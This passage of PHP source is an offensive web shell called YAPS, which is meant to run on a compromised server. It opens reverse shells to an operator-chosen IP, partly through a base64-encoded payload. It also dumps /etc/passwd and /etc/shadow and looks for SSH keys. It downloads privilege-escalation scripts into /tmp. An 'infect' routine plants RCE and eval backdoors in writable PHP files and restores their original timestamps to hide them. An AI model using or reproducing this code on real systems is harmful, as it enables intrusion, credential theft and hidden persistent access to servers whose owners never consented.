"https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh", "linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh", "verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version", "updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php"); $ip = ''; $port = 7359; $ps1_color = true; // colored prompt (prettier :) $color = true; // prompt, banner, info colors (better readability) $use_password = false; // only allows remote using the shell w/ password // sha512("vErY_Go0d_$aLt".sha512("password123")) $salt = 'v_3_r_Y___G_o_0_d___s_4_L_t'; $pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; // default: pass123 $auto_verify_update = false; // if true, will check on every run for update $silent = false; //if true, does not display banner on connect if(isset($_GET['vrfy'])) die("baguvix"); //verification ######################### END CONFIGS ######################### $yaps = $_SERVER['SCRIPT_FILENAME']; // sets reverse socket via $_POST['x'] (stealthier, no IP on apache log request line) if(isset($_POST['x']) && strpos($_POST['x'], ":") !== false){ $skt = explode(":", $_POST['x']); $ip = $skt[0]; $port = $skt[1]; } $banner = cyan(' o o O o--o o-o \ / / \ | ) ( O o---o O--o o-o | | | | ) o o o o o--o Yet Another PHP Shell').' Version '.$version.' Coder: Nicholas Ferreira'; ########################## PARSE ARGV ######################## $short_args = "u::h::s::"; $long_args = array("update::","help::","silent::"); $options = getopt($short_args, $long_args); if(isset($options['h']) || isset($options['help'])) die(usage()); if(isset($options['u']) || isset($options['update'])) die(verify_update()); if(isset($options['s']) || isset($options['silent'])) $silent = true; if(php_sapi_name() == "cli"){ // if yaps is run via cli, parse args if($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc-1])){ // $ php yaps.php 4444 $port = $argv[$argc-1]; $ip = $argv[$argc-2]; }else{ foreach($argv as $arg){ if(strpos($arg, ":") !== false){ // if an argument is of the form .*:[0-9]+ $socket = explode(":", $arg); $ip = $socket[0]; $port = (int)$socket[1]; } } } } ##################### END ARGV PARSING ###################### $commands = array( "all-colors", // "backdoor", "color", // "download", "duplicate", "enum", "help", "infect", "info", "passwd", "php", "stabilize", "suggester" // "upload" ); function green($str){ global $color; return $color ? "\e[92m".$str."\e[0m" : $str; } function red($str){ global $color; return $color ? "\e[91m".$str."\e[0m" : $str; } function yellow($str){ global $color; return $color ? "\e[93m".$str."\e[0m" : $str; } function cyan($str){ global $color; return $color ? "\e[96m".$str."\e[0m" : $str; } function white($str){ global $color; return $color ? "\e[97m".$str."\e[0m" : $str; } function banner(){ global $banner; return $banner.white(' This is ').red('NOT').white(' an interactive shell. Use ').green('!help').white(' to see commands.'); } function usage(){ global $banner,$version; return $banner.' '.yellow('Usage:').white(' There are three ways you can start the connection: ').green('1. Via command line in the compromised host;').' E.g: $ php yaps.php [options] [ip port|ip:port] '.green('2. Making a POST request to the file with the parameter "x";').' E.g: $ curl -X POST -d "x=" hacked.com/uploads/yaps.php '.green('3. Making a GET request without parameters (will connect to the hardcoded socket);').' E.g: $ curl hacked.com/uploads/yaps.php '.yellow('Options:').white(' -h, --help: Show this help -s, --silent: Silent mode (does not display banner) -u, --update: Check if YAPS is up to date ').yellow('Examples (suppose your IP is').' infected@host:~$ php yaps.php -s 4444 infected@host:~$ php yaps.php your@machine:~$ curl -X POST -d "x=" hacked.com/uploads/yaps.php '; } function isAvailable($function){ $dis = ini_get('disable_functions'); if(!empty($dis)){ $dis = preg_replace('/[, ]+/', ',', $dis); $dis = explode(',', $dis); // split by comma $dis = array_map('trim', $dis); //remove whitespace at the beginning and end }else{ $dis = array(); } if(is_callable($function) and !in_array($function, $dis)) return true; return false; } function help(){ $help = ' '.green('Useful commands:').' '.cyan('!help').' Display this menu '.cyan('!all-colors').' Toggle all colors (locally only) '.cyan('!color').' Toggle $PS1 color (locally only) '.cyan('!duplicate').' Spawn another reverse shell '.cyan('!enum').' Download Linpeas and Linenum to /tmp and get it ready to run '.cyan('!infect').' Inject payloads into PHP files '.cyan('!info').' List information about target './*cyan('!download ').' Downloads file from target to your PC '.cyan('!upload ').' Uploads a source file from your PC to target destination folder '.*/cyan('!passwd').' Show options for password '.cyan('!php').' Write and run PHP code on the remote host '.cyan('!stabilize').' Stabilize to an interactive shell '.cyan('!suggester').' Download Linux Exploit Suggester to /tmp and get it ready to run '.green('Command line options:').' '.white('$ php yaps.php [--update|-u]').' Check if YAPS is up to date '.white('$ php yaps.php ip port').' Connect to ip:port '; return $help; } function run_cmd($c){ // modified from msf $c = $c." 2>&1\n"; // stderr to stdout if(isAvailable('exec')){ $stdout = array(); exec($c, $stdout); $stdout = join(chr(10),$stdout).chr(10); }else if(isAvailable('shell_exec')){ $stdout = shell_exec($c); }else if(isAvailable('popen')){ $fp = popen($c, 'r'); $stdout = NULL; if(is_resource($fp)) while (!feof($fp)) $stdout .= fread($fp, 1024); @pclose($fp); }else if(isAvailable('passthru')){ ob_start(); passthru($c); $stdout = ob_get_contents(); ob_end_clean(); }else if(isAvailable('proc_open')){ $handle = proc_open($c, array( array('pipe','r') , array('pipe','w') , array('pipe','w') ) , $pipes); $stdout = NULL; while (!feof($pipes[1])) $stdout .= fread($pipes[1], 1024); @proc_close($handle); }else if(isAvailable('system')){ ob_start(); system($c); $stdout = ob_get_contents(); ob_end_clean(); }else{ $stdout = 0; } return $stdout; } $ps1 = "[YAPS] ".str_replace(PHP_EOL,"",green(run_cmd("whoami")."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$ function sysinfo(){ global $s; fwrite($s,green("\n====================== Initial info ======================\n\n")); $info = cyan("[i] OS info:\n").run_cmd("lsb_release -a | grep -v 'No LSB'").PHP_EOL; $info .= cyan("[i] Hostname: ").run_cmd("hostname"); $info .= cyan("[i] Kernel: ").run_cmd("uname -a"); $info .= cyan("[i] CPU: \n").run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'"); $info .= cyan("[i] RAM: \n").run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'"); $info .= cyan("[i] Sudo version: ").run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3"); $info .= cyan("[i] User/groups: ").run_cmd("id").PHP_EOL; $info .= cyan("[i] Active TTY: \n").run_cmd("w").PHP_EOL; fwrite($s, $info); fwrite($s,green("====================== Users info ======================\n\n")); $info = cyan("[i] Current user: ").run_cmd("whoami"); $info .= cyan("[i] Users in /home: \n").run_cmd("ls /home").PHP_EOL; $info .= cyan("[i] Crontab of current user: \n").run_cmd("crontab -l | egrep -v '^#'").PHP_EOL; $info .= cyan("[i] Crontab: \n").run_cmd("cat /etc/crontab | egrep -v '^#'").PHP_EOL; fwrite($s, $info); fwrite($s,green("====================== All users ======================\n\n")); fwrite($s, run_cmd("cat /etc/passwd").PHP_EOL); if(is_readable("/etc/shadow")) fwrite($s, red("[!] /etc/shadow is readable!\n").run_cmd("cat /etc/shadow").PHP_EOL); fwrite($s, green("====================== Net info ======================\n\n")); $info = cyan("[i] IP Info: \n").run_cmd("ifconfig").PHP_EOL; $info .= cyan("[i] Hosts: \n").run_cmd("cat /etc/hosts | grep -v '^#'").PHP_EOL; // /etc/hosts file $info .= cyan("[i] Interfaces/routes: \n").run_cmd("cat /etc/networks && route").PHP_EOL; $info .= cyan("[i] IP Tables rules: \n").run_cmd("(iptables --list-rules 2>/dev/null)").PHP_EOL; $info .= cyan("[i] Active ports: \n").run_cmd("(netstat -punta) 2>/dev/null").PHP_EOL; //established, listening,, fwrite($s, $info); fwrite($s, green("====================== Interesting binaries ======================\n\n")); $interesting_binaries = array('nc','nc.traditional','ncat','nmap','perl','python','python2','python2.6','python2.7','python3','python3.6','python3.7','ruby','node','gcc','g++','docker','php'); foreach($interesting_binaries as $binary) { $binary = shell_exec("which $binary 2>/dev/null"); if($binary !== "" && base64_encode($binary.PHP_EOL) !== "Cg==") // if not empty or newline fwrite($s, run_cmd("ls -l $binary")); } fwrite($s, green("\n====================== SUID binaries ======================\n\n")); $suid_list = explode("\n",shell_exec("find / -type f -perm /4000 2>/dev/null")); foreach($suid_list as $suid) if($suid !== "") fwrite($s, run_cmd("ls -l $suid")); fwrite($s, green("\n====================== SSH files ======================\n\n")); $authorized_keys = explode("\n",shell_exec("find / -type f -name authorized_keys 2>/dev/null")); // search for authorized_keys file foreach($authorized_keys as $public_key) if(is_writable($public_key)) fwrite($s, red("[Writable] ").$public_key.PHP_EOL); else fwrite($s, $public_key.PHP_EOL); $id_rsa = explode("\n",shell_exec("find / -type f -name id_rsa 2>/dev/null")); // search for id_rsa files foreach($id_rsa as $priv_key) if(is_readable($priv_key)) fwrite($s, red("[Readable] ").$priv_key.PHP_EOL); else fwrite($s, $priv_key.PHP_EOL); fwrite($s, green("\n=================== Writable PHP files ===================\n\n")); $webfiles_arr = array(); $webdir = array('/var/www','/srv','/usr/local/apache2','/var/apache2','/var/www/nginx-default'); foreach($webdir as $dir) $webfiles_arr = array_merge($webfiles_arr, explode("\n", shell_exec("find ".$dir." -type f -name '*.php*' -writable 2>/dev/null"))); if(count($webfiles_arr) > 25){ for($i=0;$i<25;$i++) if($webfiles_arr[$i] !== "") fwrite($s, red("[Writable] ").$webfiles_arr[$i].PHP_EOL); fwrite($s, "...\n...".PHP_EOL); fwrite($s, green("[+] "). "Showing only the first 25 files. There are more!".PHP_EOL); }else{ foreach($webfiles_arr as $file) if($file !== "") fwrite($s, red("[Writable] ").$file.PHP_EOL); } fwrite($s, cyan("\n[i]")." Get more information with !enum.".PHP_EOL); } function random_name($name = ""){ $charset = implode("",array_merge(range("A", "Z"), range("a","z"), range(0,9))); // merge arrays and join them into a string for($i=0;$i<=mt_rand(5,6);$i++) $name .= $charset[mt_rand(0,strlen($charset)-1)]; return $name; } function download($url, $saveTo){ //download file from $url to $saveTo $randomName = random_name(); $content = get_request($url); if(isAvailable('file_put_contents')) if(file_put_contents($saveTo."/".$randomName,$content)) return $randomName; if(isAvailable('fopen') && isAvailable('fwrite') && isAvailable('fclose')){ $fp = fopen($saveTo."/".$randomName, "w"); if(fwrite($fp, $content)){ fclose($fp); return $randomName; } } return false; } function enum(){ //download linpeas, save to /tmp and change its permission to 777 global $s, $resources; $downloadLinpeas = download($resources["linpeas"], "/tmp/"); $downloadLinenum = download($resources["linenum"], "/tmp"); if($downloadLinpeas){ fwrite($s, green("[+]")." Linpeas saved to /tmp/".$downloadLinpeas.cyan("\n[i] Changing permissions...\n")); if(chmod("/tmp/".$downloadLinpeas, 777)) fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinpeas." | tee /tmp/linpeas.log\n\n")); else fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinpeas."\n\n")); } if($downloadLinenum){ fwrite($s, green("[+] Linenum saved to /tmp/".$downloadLinenum).cyan("\n[i] Changing permissions...\n")); if(chmod("/tmp/".$downloadLinenum, 777)) fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinenum." | tee /tmp/linenum.log\n")); else fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinenum."\n")); } } function suggester(){//download linux exploit suggester, save to /tmp and change its permission to 777 global $s, $resources; $download = download($resources["suggester"], "/tmp/"); if($download){ fwrite($s, green("[+]")." Linux Exploit Suggester saved to /tmp/".$download.cyan("\n[i]")." Changing permissions...\n"); if(chmod("/tmp/".$download, 777)) fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$download." | tee /tmp/LES.log\n")); else fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$download."\n")); } return; } function refresh_ps1($changecolor=false){ //build a nice PS1, toggle between colored and not colored global $ps1_color,$ps1; $user = str_replace(PHP_EOL, "", run_cmd("whoami")); if(!$ps1_color){ $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",green($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$ if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",red($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."# "); // root@hostname:~# if($changecolor) $ps1_color = true; }else{ $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."$ "); // user@hostname:~$ if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."# "); // root@hostname:~# if($changecolor) $ps1_color = false; } } function getPHP(){ //receive PHP code via socket global $s; $php = ''; fwrite($s, cyan("[*]")." Write your PHP code (*without* PHP tags). To send and run it, use ".green("!php").". ".yellow("\n[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.").white("\nphp> ")); while($c = fread($s, 4096)){ if(substr($c,0,-1) == "!php") // remove newline at end return $php; if(substr($c,0,-1) == "!cancel") // remove newline at end return 0; fwrite($s, white("php> ")); //prompt $php .= $c; // append received line to the whole php code to be executed } return $php; } function runPHP($code){ // guess what try{ ob_start(); eval($code); // do the magic $result = ob_get_contents(); //get buffer from eval() to return later ob_end_clean(); }catch (Throwable $ex){ $err = explode("Stack trace:", $ex); $result = $err[0]; //return the error } return $result; } function stabilize($post_socket=""){ // spawn an interactive shell global $s, $port, $ip; $payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw==";// modified php-reverse-shell (works w/ sudo, mysql, ftp, su, etc.) if(strlen($post_socket) > 1 && strlen($post_socket) > 0){ //if is set echo $post_socket; $skt = explode(":", $post_socket); $post_ip = $skt[0]; $post_port = $skt[1]; $final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); // changes payload to add correct socket shell_exec("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);'"); return; } fwrite($s, yellow("[i]")." Set up a listener on another port (nc -lnvp ) and press ENTER.\nChoose a port: "); while($c = fread($s, 8)){ //reads [ENTER] if(strlen($c) > 0){ // got [ENTER] $recv_port = (int)$c; // get the integer part if($recv_port>65535 || $recv_port==0){ fwrite($s,red("[-]")." Port must be between 0-65535.\nChoose another port: "); }else{ $final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); // changes payload to add correct socket fwrite($s, yellow("[i]")." Trying to connect to $ip:$recv_port\n"); if(isAvailable("popen") && isAvailable("pclose")){ pclose(popen("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);' &",'r')); // does the magic return; } // in case we don't have popen or pclose $curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php run_cmd("timeout --kill-after 0 1 wget --post-data=\"x=$ip:$recv_port&stabilize=1\" $curl_url > /dev/null"); // thx znttfox =) return; } } } } function backdoor(){ // todo } function check_password(){ //ask for password and return 0 or 1 global $s, $pass_hash, $salt; fwrite($s, yellow("[i] ")."This shell is protected. \nEnter the password: "); while($data = fread($s,1024)){ $entered_pass = substr($data,0,-1); //remove newline at end return hash("sha512", $salt.hash("sha512",$entered_pass, false), false) == $pass_hash ? true : false; } } function change_password($new){ global $salt, $yaps, $s; $new_hash = hash("sha512", $salt.hash("sha512",$new, false), false); if(!is_readable($yaps) || !is_writable($yaps)) return false; //someone changed the permission $yaps_code = file_get_contents($yaps); $new_yaps_code = preg_replace('/[a-f0-9]{128}/', $new_hash, $yaps_code, 1); // the password hash is be the first thing this regex should match if(file_put_contents($yaps, $new_yaps_code)){ fwrite($s, green("[+] ")."Password changed. Changes will take effect on next connection.\n"); return true; }else{ fwrite($s, red("[-] ")."Couldn't read or write the file. Are the permissions right?\n" . run_cmd("ls -l ".$yaps."\n")); return false; } } function toggle_password(){ global $use_password, $s, $yaps; $yaps_code = file_get_contents($yaps); if($use_password){ //password currently active $new_yaps_code = preg_replace('/(\$use_password += +)(true)/', '$1false', $yaps_code, 1); if(file_put_contents($yaps, $new_yaps_code)){ $use_password = false; fwrite($s, green("[+] ")."Password deactivated.\n"); return true; } fwrite($s, red("[-] ")."Couldn't deactivate password.\n"); return false; } // will enter here if $use_password is false $new_yaps_code = preg_replace('/(\$use_password += +)(false)/', '$1true', $yaps_code, 1); //limit must be 1 if(file_put_contents($yaps, $new_yaps_code)){ $use_password = false; // if limit isn't 1, this will be changed to false too fwrite($s, green("[+] ")."Password activated.\n"); return true; } fwrite($s, red("[-] ")."Couldn't activate password.\n"); return false; } function passwd(){ global $s,$use_password; if($use_password){ if(!check_password()){ fwrite($s, red("[-] ")." Wrong password\n"); return; } fwrite($s, green("[+] Password is enabled. ").white("Choose an option:")."\n[1] Change password\n[2] Disable password\n[3] Cancel\n> "); while($data = fread($s, 8)){ switch(substr($data, 0, -1)){ case "1": // change password fwrite($s,cyan("[*] ")."Choose the new password: "); while($data2 = fread($s, 1024)){ $newPass = substr($data2, 0, -1); //remove newline at end change_password($newPass); return; } break; case "2": // disable password toggle_password(); return; break; default: fwrite($s, cyan("[*] ")."Canceled.\n"); return; break; } } }else{ // no password required fwrite($s, yellow("[!] Password is disabled. ").white("Choose an option:")."\n[1] Set a password\n[2] Enable password\n[3] Cancel\n> "); while($data = fread($s, 8)){ switch(substr($data, 0, -1)){ case "1": // set a new password fwrite($s,cyan("[*] ")."Choose the new password: "); while($data2 = fread($s, 1024)){ $newPass = substr($data2, 0, -1); //remove newline at end change_password($newPass); return; } break; case "2": // enable password toggle_password(); return; break; default: fwrite($s, cyan("[*] ")."Canceled.\n"); return; break; } } } } function duplicate(){ global $s,$ip,$port,$_SERVER; if(!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])){ fwrite($s, yellow("[-] ")."Couldn't find YAPS URL. Did you run me via command line?\nPlease provide the correct YAPS URL (example.com/files/yaps.php): "); while($yaps_url = fread($s, 256)){ if(get_request(preg_replace("/\n/", "",$yaps_url."?vrfy")) !== "baguvix") return fwrite($s, red("[-] ")."Couldn't validade YAPS URL. Is this the correct URL?\n"); break; } $curl_url = $yaps_url; }else{ $curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php echo $curl_url; } fwrite($s, cyan("[*] ")."Choose a port to listen (default: $port): "); while($new_port = fread($s, 32)){ $new_port = (base64_encode($new_port) == "Cg==") ? $port: substr($new_port,0,-1); //if new_port= newline, new_port = old port $socket = array('x' => $ip.":".$new_port); fwrite($s, "Connecting to ".$ip.":".$new_port."\n"); $cmd = "wget -qO- --post-data=\"".http_build_query($socket)."\" $curl_url > /dev/null"; if(isAvailable("popen") && isAvailable("pclose")) pclose(popen($cmd." &",'r')); // doesn't wait for wget to return else run_cmd("timeout --kill-after 0 1 ".$cmd); // thx znttfox =) return; } } function get_request($url){ //todo: change download function $response = false; if(isAvailable("file_get_contents")){ $response = file_get_contents($url); }elseif(isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")){ $response = fread(fopen($url, "r"),10); }elseif(in_array("curl",get_loaded_extensions())){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); }elseif($tmp_curl = run_cmd("curl -s ".$url)){ $response = $tmp_curl; }elseif($tmp_wget = run_cmd("wget -qO- ".$url)){ $response = $tmp_wget; } return $response; } function verify_update(){ global $version, $resources; $newest_version = 0; echo cyan("[i] ")."Your version: $version. Checking for updates...\n"; $request = get_request($resources["verifyUpdateURL"]); if($request) $newest_version = $request; $newest_version_ = (int)str_replace(".","",$newest_version); //get only numbers $version_ = (int)str_replace(".","",$version); if($newest_version_ !== 0 && $newest_version_ > $version_){ echo red("[i]")." Your version is not up to date.\n".green("[DOWNLOAD v".str_replace("\n","",$newest_version)."]: ").$resources["updateURL"]."\n"; return; } echo green("[+] ")."YAPS is already up to date (v$version)!\n"; return; } function getFiles($dir){ // return writable php files on webserver root $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); //list recursively $list = array(); foreach($iterator as $file) if(!is_dir($file) && is_writable($file)) //list only writable files if($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) //remove myself from list if(substr($file->getPathName(),-4) == ".php") //list only php files array_push($list,$file->getPathName()); sort($list); return $list; } function select_files(){ global $s; $webdir = array('/var/www/','/srv/','/usr/local/apache2/','/var/apache2/','/var/www/nginx-default/'); $webfiles_arr = array(); foreach($webdir as $dir) try{ $list = getFiles($dir); $webfiles_arr = array_merge($webfiles_arr,$list); }catch(Exception $e){} if(count($webfiles_arr) > 0) fwrite($s, cyan("[*] ").white("Found ".count($webfiles_arr)." writable PHP files:\n")); for($i=0;$i $range[0]=4, $range[1]=6 if((int)$range[0] < (int)$range[1]) // 4 must be < than 6 for($i=(int)$range[0];(int)$i<=$range[1];$i++) // from i=4 to i=6 array_push($toInfect, $i); } } sort($toInfect,SORT_NUMERIC); choose_payload($webfiles_arr,array_unique($toInfect)); //remove duplicates return; } } function choose_payload($allFiles,$toInfect){ global $s; $payloads = array( //curl -d "0=whoami" website.com/infected_file.php //curl website.com/infected_file.php?0=whoami "0. TinyRCE " => '', //same "1. ClassicRCE " => '', //curl -d "0=phpinfo();" website.com/infected_file.php "2. Eval " => '', //curl -d "0=cGhwaW5mbygpOw==" website.com/infected_file.php (encoded phpinfo()) "3. BasedEval " => '', //curl -d "0=c2.com/file_to_be_executed.txt" website.com/infected_file.php "4. RemotePHP " => '', //curl -d "0=c2.com/file_to_upload&1=extension" website.com/infected_file.php "5. RemoteUpload " => '', //curl -F "0=@file_to_upload.php" website.com/infected_file.php "6. LocalUpload " => '', //curl "0=your_ip&1=port" website.com/infected_file.php "7. StableShell " => 'array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$f=proc_open($a,$e,$g);foreach($g as $p)stream_set_blocking($p,0);stream_set_blocking($b,0);while(!feof($b)){$i=array($b,$g[1],$g[2]);if(in_array($b,$i))fwrite($g[0],fread($b,2048));if(in_array($g[1],$i))fwrite($b,fread($g[1],2048));if(in_array($g[2],$i))fwrite($b,fread($g[2],2048));}fclose($b);foreach($g as $p)fclose($p);proc_close($f);?>' ); fwrite($s, cyan("\n[i] ").white("List of payloads available:\n")); $i=true; foreach($payloads as $name => $code){ $desc = $i ? cyan($name).$code : cyan($name).white($code); fwrite($s, $desc."\n"); $i = !$i; //toggle payload color } fwrite($s, cyan("\n[?] ").white("Choose a payload to infect the selected files (default:0): ")); while($choosed_payload = fread($s, 128)){ $user_payload = 0; if((int)$choosed_payload <= count($payloads)+1) $user_payload = $choosed_payload; break; } fwrite($s, cyan("[?] ").white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? ")); while($position = fread($s, 128)){ $position = 1; if((int)$position === 0) $position = 0; break; } infect($allFiles,$toInfect,(int)$user_payload,$payloads,(int)$position); return; } //list of all writable php files, files to be infected, index of choosen payload, list of payload, position (beginning or end of file) function infect($allFiles,$fileArr,$payload_index,$payload_list,$position=1){ // 1 = end; 0 = beginning global $s; $payload = $payload_list[array_keys($payload_list)[$payload_index]]; //the payload itself fwrite($s, yellow("\n[!] ").white("Files to infect:\n")); foreach($fileArr as $fileToInfect) fwrite($s,$allFiles[$fileToInfect]."\n"); fwrite($s, yellow("[!] ").white("Payload: ").$payload_list[array_keys($payload_list)[$payload_index]]."\n"); $position_str = $position ? "End of file" : "Beginnig of file"; fwrite($s, yellow("[!] ").white("Position: ").$position_str."\n"); fwrite($s, cyan("[?] ").white("Are you sure you want to infect those files? [Y/n]")); while($sure = fread($s, 128)){ if(strtolower(substr($sure,0,1)) == "n") return; //not sure, return break; } foreach($fileArr as $fileToInfect){ $filePath = $allFiles[$fileToInfect]; //fileToInfect is an integer that is the index of the array $allFiles if(isAvailable("file_get_contents") && isAvailable("file_put_contents")){ $old = file_get_contents($filePath); $originalDate = str_replace("\n","",run_cmd("stat ".$filePath.' | grep Modify | sed "s/Modify: //"')); //modify date if($position) //end of file $written = file_put_contents($filePath, "\n".$payload, FILE_APPEND) ? 1 : 0; else //beginning of file $written = file_put_contents($filePath, $payload."\n".$old) ? 1 : 0; $result = $written ? green("[+] ").white($filePath." was infected with payload !") : red("[-] ").white($filePath." Error!"); fwrite($s,$result."\n"); if(run_cmd("touch -d ".'"'.$originalDate.'" '.$filePath)) fwrite($s,green("[+] ").white("Mantained original 'modified date' (".$originalDate.").\n")); } } return; } function parse_stdin($input){ global $s, $color; switch(substr($input,0,-1)){ // remove newline at end case "!all-colors": $color = !$color; break; case "!info": return sysinfo(); break; case "!enum": return enum(); break; case "!suggester": return suggester(); break; case "!color": refresh_ps1(true); break; case "!help": return help(); break; case "!php": $phpCode = getPHP(); if($phpCode !== 0){ $result = runPHP($phpCode); fwrite($s, $result); }else{ fwrite($s, yellow("[i] Code canceled.").PHP_EOL); } break; case "!stabilize": stabilize(); break; case "!backdoor": backdoor(); break; case "!passwd": passwd(); break; case "!duplicate": duplicate(); break; case "!infect": select_files(); break; } } function cmd_not_found($cmd){ global $s, $commands; foreach($commands as $valid_cmd){ similar_text($cmd, $valid_cmd, $percentage); if($percentage > 70){ // if they're similar, suggest correction fwrite($s, yellow("[!] ")."Command '!$cmd' not found. Did you mean '!".$valid_cmd."'?.\n"); return; } } fwrite($s, yellow("[!] ")."Command '!".substr($c,1,-1)."' not found. Use !help.\n"); return; } function connect(){ global $use_password,$commands,$ps1,$s,$silent; refresh_ps1(1); if(!isAvailable('fsockopen')) die(red("[-]")." Function 'fsockopen' isn't available."); if($use_password) if(!check_password()) die(fwrite($s,red("[-]")." Wrong password.\n")); // guess what if(!isset($_REQUEST['silent']) && !isset($_REQUEST["s"]) && !$silent) //if not in silent mode fwrite($s, banner()."\n"); //send banner through socket refresh_ps1(); fwrite($s, "\n".$ps1); while($c = fread($s, 2048)){ $out = ''; if(substr($c,0,1) == "!"){//if starts with "!" if(in_array(strtolower(substr($c,1,-1)), $commands)) // if the command is valid $out = parse_stdin($c); else cmd_not_found(substr($c,1,-1)); // try to suggest correction }elseif(substr($c, 0, 3) == 'cd '){ chdir(substr($c, 3, -1)); // since this isn't interactive, use chdir }elseif(substr($c,0,-1) == "exit"){ fwrite($s, yellow("[i] 